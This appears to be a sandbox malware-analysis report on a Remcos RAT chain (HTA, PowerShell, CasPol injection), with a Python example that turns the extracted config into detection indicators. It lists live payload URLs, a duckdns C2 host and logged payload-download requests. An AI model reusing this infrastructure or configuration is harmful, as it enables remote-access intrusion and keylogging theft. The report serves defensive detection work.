                    2024-11-26T09:44:13.870876+0100 | 2057635 | 1 | A Network Trojan was detected | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                    2024-11-26T09:44:29.901520+0100 | 2049038 | 1 | A Network Trojan was detected | 193.30.119.205 | 443 | 192.168.2.4 | 49731 | TCP
                    2024-11-26T09:44:13.870876+0100 | 2858295 | 1 | A Network Trojan was detected | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                    2024-11-26T09:44:17.456994+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.168.46.26 | 80 | TCP


                    AV Detection

                    Source: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF | Avira URL Cloud: Label: malware
                    Source: nextnewupdationsforu.duckdns.org | Avira URL Cloud: Label: malware
                    Source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | ReversingLabs: Detection: 21%
                    Source: Yara match | File source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_0043293A
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_62091fbc-1
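The extracted Remcos configuration above already holds what a defender needs to pivot on: the C2 host and port, the mutex, and the persistence flags. The Python below is an added example (not Joe Sandbox code): it parses that configuration into indicators and runs them over a few constructed telemetry events. The configuration text is copied from the report with unused fields dropped; the event format is invented for the example, and the DNS answer 192.169.69.26 is an assumption consistent with the report's traffic, which shows a query for the duckdns name followed by connections to 192.169.69.26:14645.

```python
import json

# Remcos configuration as printed by the report's Malware Configuration Extractor (copied from
# the AV Detection entry above; fields this example does not use are omitted).
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"],
 "Assigned name": "RemoteHost", "Connect interval": "1",
 "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable",
 "Copy file": "remcos.exe", "Copy folder": "Remcos", "Mutex": "Rmc-EC111K",
 "Keylog file": "logs.dat", "Keylog folder": "remcos"}'''


def load_config(text=REMCOS_CONFIG_JSON):
    return json.loads(text)


def parse_c2(entry):
    """'host:port:password' -> (host, port, password); split from the right so the
    port and password are always the last two fields."""
    host, port, password = entry.rsplit(":", 2)
    return host.lower(), int(port), password


def indicators(cfg):
    """Turn the extracted config into values a SOC can match telemetry against."""
    c2 = [parse_c2(e) for e in cfg["Host:Port:Password"]]
    mutex = cfg["Mutex"]
    return {
        "c2_hosts": {h for h, _, _ in c2},
        "c2_ports": {p for _, p, _ in c2},
        "mutex": mutex,
        # The report records the implant writing HKCU\SOFTWARE\Rmc-EC111K\exepath, i.e. a
        # per-build key named after the mutex string.
        "registry_key": "HKEY_CURRENT_USER\\SOFTWARE\\" + mutex,
        "run_key_persistence": "Enable" in (cfg.get("Setup HKCU\\Run"), cfg.get("Setup HKLM\\Run")),
        "dropped_file": cfg.get("Copy file"),
    }


# Constructed telemetry in a simplified event shape (not the report's own event format).
# The DNS answer is an assumption: the report shows the query and the 14645/tcp connections,
# but does not print the resolved address.
CONSTRUCTED_TELEMETRY = [
    {"type": "dns", "name": "nextnewupdationsforu.duckdns.org", "answer": "192.169.69.26"},
    {"type": "net", "pid": 5480, "dst": "192.169.69.26", "dport": 14645},
    {"type": "registry", "pid": 5480, "key": r"HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath"},
    {"type": "net", "pid": 1234, "dst": "192.169.69.26", "dport": 443},  # same IP, not the C2 port
    {"type": "registry", "pid": 1234,
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},  # benign shape
]


def scan(events, ioc):
    """Match events against the indicators. A connection counts as C2 only when the
    destination was resolved from a configured C2 hostname and uses a configured port."""
    resolved, hits = set(), []
    for ev in events:
        if ev["type"] == "dns" and ev["name"].lower() in ioc["c2_hosts"]:
            resolved.add(ev["answer"])
            hits.append(("c2_dns", ev["name"]))
        elif ev["type"] == "net" and ev["dst"] in resolved and ev["dport"] in ioc["c2_ports"]:
            hits.append(("c2_connection", f"{ev['dst']}:{ev['dport']}"))
        elif ev["type"] == "registry" and \
                ev["key"].lower().startswith(ioc["registry_key"].lower() + "\\"):
            hits.append(("remcos_registry", ev["key"]))
    return hits


if __name__ == "__main__":
    ioc = indicators(load_config())
    for hit in scan(CONSTRUCTED_TELEMETRY, ioc):
        print(*hit)
```

The registry match relies on the report's own observation that the implant stores its path under HKCU\SOFTWARE\<mutex>\exepath (TargetObject HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath in the Stealing of Sensitive Information entry), so the mutex string doubles as a host indicator. The connection check deliberately leaves the same IP on port 443 unmatched: without the DNS context a bare destination IP is weak evidence for a dynamic-DNS C2.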

                    Exploits

                    Source: Yara match | File source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00406764 _wcslen,CoGetObject,13_2_00406764

                    Phishing

                    Source: Yara match | File source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta, type: SAMPLE
                    Source: unknown | HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1711723967.000000000754A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskscheduler
showmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sd
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.pdb source: powershell.exe, 00000001.00000002.1818550362.0000000004BE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1713731202.00000000084D2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2098398956.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2099153712.000000000742A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,13_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,13_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00406AC2 FindFirstFileW,FindNextFileW,13_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,13_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,13_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406F06

                    Software Vulnerabilities

                    Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 104.168.46.26:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49795 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49821 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49850 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49904 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49929 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50019 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50018 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50020 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50007 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50021 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.168.46.26:80 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.4:49731
                    Source: Malware configuration extractorURLs: nextnewupdationsforu.duckdns.org
                    Source: unknownDNS query: name: nextnewupdationsforu.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/RFGVGF.txt HTTP/1.1Host: 104.168.46.26Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
                    Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                    Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: GET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.46.26Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.46.26
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004260F7 recv,13_2_004260F7
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.46.26Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1422/RFGVGF.txt HTTP/1.1Host: 104.168.46.26Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: nextnewupdationsforu.duckdns.org
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestof
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1829521422.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF
                    Source: powershell.exe, 00000001.00000002.1816371508.0000000000A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFP
                    Source: powershell.exe, 00000003.00000002.1706219573.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2473025138.0000000003386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000005314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000514A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000007.00000002.2469026614.00000000031B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.co
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
                    Source: powershell.exe, 00000009.00000002.2099410808.000000000746F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2100899330.0000000007541000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2046886997.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
                    Source: powershell.exe, 00000009.00000002.2099410808.0000000007496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemailQ
                    Source: powershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000511A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000512B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1818550362.0000000004EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.1829521422.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: powershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000013_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,13_2_00409B10
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
